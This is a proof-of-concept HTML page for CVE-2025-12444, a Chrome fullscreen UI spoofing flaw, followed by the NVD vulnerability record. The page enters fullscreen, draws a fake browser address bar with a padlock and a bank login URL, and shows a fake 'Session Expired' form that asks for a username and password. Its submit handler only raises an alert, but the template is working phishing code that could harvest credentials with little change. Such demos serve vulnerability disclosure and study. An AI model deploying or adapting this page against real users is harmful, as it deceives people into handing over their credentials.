CVE-2025-12444

<!-- CVE-2025-12444 UI Spoofing PoC --> <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>CVE-2025-12444 PoC</title> <style> * { margin: 0; padding: 0; box-sizing: border-box; } body { font-family: Arial, sans-serif; background: #202124; color: white; overflow: hidden; } .fake-toolbar { position: fixed; top: 0; left: 0; right: 0; height: 50px; background: #3c4043; display: flex; align-items: center; padding: 0 15px; z-index: 99999; border-bottom: 1px solid #5f6368; } .fake-url-bar { flex: 1; height: 36px; background: white; border-radius: 18px; display: flex; align-items: center; padding: 0 15px; color: #202124; font-size: 14px; } .fake-lock { margin-right: 8px; color: green; } .fake-content { margin-top: 60px; padding: 20px; text-align: center; } .fake-form { max-width: 400px; margin: 50px auto; padding: 30px; background: #3c4043; border-radius: 8px; } .fake-input { width: 100%; padding: 12px; margin: 10px 0; border: 1px solid #5f6368; border-radius: 4px; background: #202124; color: white; } .fake-button { width: 100%; padding: 12px; margin-top: 15px; background: #8ab4f8; border: none; border-radius: 4px; color: #202124; cursor: pointer; font-weight: bold; } .trigger-btn { padding: 15px 30px; font-size: 18px; background: #1a73e8; color: white; border: none; border-radius: 8px; cursor: pointer; } #fullscreen-content { display: none; width: 100vw; height: 100vh; background: #ffffff; } </style> </head> <body> <div id="initial-screen"> <div class="fake-content"> <h1>CVE-2025-12444 UI Spoofing Demo</h1> <p style="margin: 20px 0; color: #bdc1c6;"> This PoC demonstrates the Fullscreen UI security flaw in Chrome. Click the button below to trigger fullscreen mode. </p> <button class="trigger-btn" onclick="enterFullscreen()"> Enter Fullscreen Mode </button> </div> </div> <div id="fullscreen-content"> <div class="fake-toolbar"> <div class="fake-url-bar"> <span class="fake-lock">🔒</span> <span>secure-bank.com/login</span> </div> </div> <div class="fake-content"> <div class="fake-form"> <h2 style="margin-bottom: 20px;">Session Expired</h2> <p style="margin-bottom: 15px; color: #bdc1c6;">Please re-enter your credentials</p> <input type="text" class="fake-input" placeholder="Username"> <input type="password" class="fake-input" placeholder="Password"> <button class="fake-button" onclick="collectData()">Login</button> </div> </div> </div> <script> function enterFullscreen() { const elem = document.getElementById('fullscreen-content'); if (elem.requestFullscreen) { elem.requestFullscreen(); } else if (elem.webkitRequestFullscreen) { elem.webkitRequestFullscreen(); } else if (elem.msRequestFullscreen) { elem.msRequestFullscreen(); } document.getElementById('initial-screen').style.display = 'none'; document.getElementById('fullscreen-content').style.display = 'block'; } function collectData() { console.log('[PoC] Data collection triggered - UI spoofing successful'); alert('UI Spoofing PoC executed successfully.\nIn a real attack, credentials would be exfiltrated.'); } document.addEventListener('keydown', function(e) { if (e.key === 'Escape') { document.getElementById('initial-screen').style.display = 'block'; document.getElementById('fullscreen-content').style.display = 'none'; } }); </script> </body> </html>

{"cve": {"id": "CVE-2025-12444", "sourceIdentifier": "[email protected]", "published": "2025-11-10T20:15:39.143", "lastModified": "2025-11-13T15:22:09.940", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Incorrect security UI in Fullscreen UI in Google Chrome prior to 142.0.7444.59 allowed a remote attacker who convinced a user to engage in specific UI gestures to perform UI spoofing via a crafted HTML page. (Chromium security severity: Low)"}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:N/A:L", "baseScore": 4.2, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.6, "impactScore": 2.5}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-306"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:google:chrome:*:*:*:*:*:*:*:*", "versionEndExcluding": "142.0.7444.59", "matchCriteriaId": "B56189F0-45F6-4A5B-AFFD-07B20B001040"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:o:apple:macos:-:*:*:*:*:*:*:*", "matchCriteriaId": "387021A0-AF36-463C-A605-32EA7DAC172E"}, {"vulnerable": false, "criteria": "cpe:2.3:o:linux:linux_kernel:-:*:*:*:*:*:*:*", "matchCriteriaId": "703AF700-7A70-47E2-BC3A-7FD03B3CA9C1"}, {"vulnerable": false, "criteria": "cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:*", "matchCriteriaId": "A2572D17-1DE6-457B-99CC-64AFD54487EA"}]}]}], "references": [{"url": "https://chromereleases.googleblog.com/2025/10/stable-channel-update-for-desktop_28.html", "source": "[email protected]", "tags": ["Release Notes", "Vendor Advisory"]}, {"url": "https://issues.chromium.org/issues/390571618", "source": "[email protected]", "tags": ["Issue Tracking", "Permissions Required"]}]}}